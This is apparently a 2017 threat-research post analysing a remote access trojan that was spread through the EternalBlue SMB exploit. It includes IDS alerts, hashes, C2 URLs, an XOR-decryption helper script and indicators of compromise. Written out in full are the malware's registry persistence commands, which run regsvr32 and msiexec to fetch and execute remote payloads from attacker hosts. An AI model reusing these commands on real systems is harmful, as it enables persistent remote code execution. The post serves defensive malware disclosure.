During the WannaCry pandemic attack, Cyphort Labs discovered that other threat actors have been using the same EternalBlue exploit to deliver other malware. This malware is not ransomware, nor is it a bitcoin miner as others have reported. It is a remote access trojan, the kind of tool typically used to spy on people’s activities or take control of their computers for whatever end the attacker wants to reach.

On May 12, at the onset of the WannaCry attack, Cyphort Labs researchers observed a similar SMB attack against one of our honeypot servers. Later on, we found evidence of the same attack perpetrated on May 3.

Network capture of the SMB exploit

The ET (Emerging Threats) rule hits below confirm that it was the EternalBlue exploit:

05/12/2017-17:27:19.766291  [**] [1:2024217:2] ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 182.18.23.38:55768 -> 192.168.160.60:445

05/12/2017-17:27:20.225752  [**] [1:2024217:2] ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 182.18.23.38:55768 -> 192.168.160.60:445

05/12/2017-17:27:20.652098  [**] [1:2024218:1] ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.160.60:445 -> 182.18.23.38:55768

05/12/2017-17:27:26.772666  [**] [1:2024218:1] ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.160.60:445 -> 182.18.23.38:55768

We initially thought this was WannaCry, but upon further investigation we discovered a stealthier Remote Access Trojan. Unlike WannaCry, this threat infects a machine only once and does not spread. It is not a worm.

Payload

Based on the pcap, the attacking IP is 182.18.23.38. This IP is located in China.

Once the exploitation is successful, the attacker sends an encrypted payload as shellcode. The shellcode is encrypted via XOR with the 4-byte key “A9 CA 63 BA”. The shellcode has an embedded binary in it, as shown below:
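As an added analyst helper (not code from the original post), the script below undoes the 4-byte repeating XOR described above and carves the embedded DLL by locating an MZ header whose e_lfanew field points at a valid PE signature; the input is a constructed sample, not the real shellcode.

```python
import struct
from itertools import cycle

# XOR key observed in the captured shellcode (from the analysis above)
XOR_KEY = bytes.fromhex("A9CA63BA")


def xor_decrypt(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Undo the repeating-key XOR applied to the payload (XOR is its own inverse)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def find_embedded_pe(blob: bytes) -> int:
    """Return the offset of the first plausible PE image inside blob, or -1.

    A PE image starts with 'MZ'; the DWORD at offset 0x3C (e_lfanew) points to
    the 'PE\\0\\0' signature. Checking both avoids false hits on stray 'MZ' bytes.
    """
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            sig_off = pos + e_lfanew
            if blob[sig_off:sig_off + 4] == b"PE\0\0":
                return pos
        pos = blob.find(b"MZ", pos + 1)
    return -1


def carve_embedded_dll(encrypted: bytes) -> bytes:
    """Decrypt the shellcode and return the embedded PE (empty bytes if none found)."""
    plain = xor_decrypt(encrypted)
    off = find_embedded_pe(plain)
    return plain[off:] if off != -1 else b""


# Constructed sample, NOT the real shellcode: a NOP-like stub, a stray 'MZ' that
# must be rejected, then a minimal fake PE header (MZ ... e_lfanew=0x40 ... PE\0\0).
_fake_pe = bytearray(b"MZ" + b"\0" * 0x3A)        # 0x3C bytes of DOS header
_fake_pe += struct.pack("<I", 0x40)                # e_lfanew at offset 0x3C
_fake_pe += b"PE\0\0" + b"\x4c\x01"                # PE signature + i386 machine
SAMPLE_PLAINTEXT = b"\x90" * 7 + b"MZ" + b"\xcc" * 5 + bytes(_fake_pe)
SAMPLE_ENCRYPTED = xor_decrypt(SAMPLE_PLAINTEXT)   # encrypting is the same XOR

if __name__ == "__main__":
    dll = carve_embedded_dll(SAMPLE_ENCRYPTED)
    print("embedded PE at offset", find_embedded_pe(xor_decrypt(SAMPLE_ENCRYPTED)),
          "size", len(dll))
```

On a real capture, feed the raw post-exploitation payload bytes to carve_embedded_dll and hash the result to compare against the MD5/SHA1 listed below.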

File Properties of the Embedded DLL

MD5: B6B68FAA706F7740DAFD8941C4C5E35A

SHA1: 806027DB01B4997F71AEFDE8A5DBEE5B8D9DBE98

Time Stamp: Sat Apr 29 09:57:21 2017

Debugging Symbols Path: d:\down10\release\down10.pdb

Exports: DllMain, test, InWMI

The embedded DLL is essentially a downloader trojan: it retrieves additional malware and receives commands from its controller. It waits for the following commands:

  • [down]
  • [cmd]

The commands are downloaded from “http://down[.]mysking.info:8888/ok.txt”.

The [down] command instructs the malware to download a file from the link given as the first parameter and save it under the path given as the second parameter. Here, it downloads “http://23.27.127.254:8888/close.bat” and saves it as c:\windows\debug\c.bat.

The [cmd] command is followed by a series of commands that the malware will execute.

Based on the commands above, it will try to delete the following user accounts:

  • Asps.xnet
  • IISUSER_ACCOUNTXX
  • IUSR_ADMIN
  • snt0454
  • Asp.net
  • aspnet

It will terminate and/or delete the following files or processes:

  • c:\windows\Logo1_.exe
  • c:\windows\dell\Update64.exe
  • Misiai.exe
  • c:\windows\RichDllt.dll
  • C:\windows\winhost.exe
  • C:\windows\ygwmgo.exe
  • c:\windows\netcore.exe

It creates a scheduled job named “Mysa” that downloads a file, a.exe, via FTP from down.mysking.info.

It sets the following Registry Run entries so that additional malware is downloaded and executed at every logon:

  • reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f
  • reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f

Then it runs c.bat and loads another DLL, item.dat, through rundll32:

  • rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa

In addition, it connects to http://wmi[.]mykings.top:8888/kill.html to obtain a checklist of processes to terminate.

2nd Stage Payload: Item.dat

We were not able to capture item.dat from our own server. This file is saved as C:\Windows\debug\item.dat, and the [cmd] command expects it to be there. We believe that this is the second-stage payload. We searched VirusTotal for such files and found this hash:

VirusTotal has seen this malware downloaded from the following links:

  • http://67[.]229.144.218:8888/test1.dat
  • http://47[.]88.216.68:8888/test.dat
  • http://47[.]52.0.176:8888/item.dat
  • http://118[.]190.50.141:8888/test.dat

This means the actors used the IPs above for their activities. It also appears to affect multiple regions, based on the VirusTotal submission sources.

This sample was first seen on VirusTotal on April 2, 2017. Since then, we have seen 12 other similar samples on VT.

This is an indication that the actors might have been using the EternalBlue exploit well before the WannaCry outbreak on May 12, 2017.

The sample is protected by the Safengine Shielden packer.

Packer Protector of item.dat

Based on the following memory dump, this sample appears to be a RAT that gives the attacker access to and control of the infected machine.

Memory Dump of running item.dat

Based on the strings above, we found a program with strong similarities: ForShare 8.28. The program is hosted on a Chinese website.

  • http://en.pudn.com/downloads758/sourcecode/windows/detail3014472_en.html
  • http://www.codeforge.cn/read/287854/MyClientTran.cpp__html

ForShare 8.28 GUI found on the web

Based on the source code, we confirmed that the malware is using a version of this ForShare Remote Access Tool. The RAT has many spying features, among them:

  • Receive and execute commands from server
  • Screen Monitoring
  • Audio and Video Surveillance
  • Monitor Keyboard
  • File and Data Transfer
  • Delete Files
  • Terminate Processes
  • Execute Files
  • Enumerate Files and Processes
  • Download Files
  • Control the machine

Below is a snippet of the commands of this RAT.

Close.bat

One interesting action the malware takes is closing port 445 by executing close.bat. Close.bat (saved locally as c.bat) contains the following code:

This is yet another indication that the malware authors are aware of the EternalBlue vulnerability and are closing it behind them. The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads the Windows-based Mirai variant Kaspersky discovered in February. We found similarities in terms of their IOCs.

Conclusion

WannaCry ransomware delivered a strong message to the world by being noisy and destructive. The message is clear now: there are many systems out there that are vulnerable to cyberattacks. At first glance, the threat we discovered may not appear as destructive as the WannaCry ransomware, but it may be equally dangerous, if not more so, depending on the attacker’s intent. The main payload is a RAT, and we all know what can happen once a malicious hacker gets inside your enterprise. In addition, had WannaCry not happened, we might not be aware of the number of systems that are vulnerable to exploits, whether zero-day, disclosed or undisclosed, and that makes this type of stealthy threat more dangerous. What will hurt you the most are the things you did not see coming.

Special thanks to Joe Dela Cruz, Alex Burt, Abhijit Mohanta and the rest of Cyphort Labs for their help in the analysis and discovery of this threat.

Indicators of Compromise

Files

C:\Windows\debug\c.bat

C:\Windows\debug\item.dat
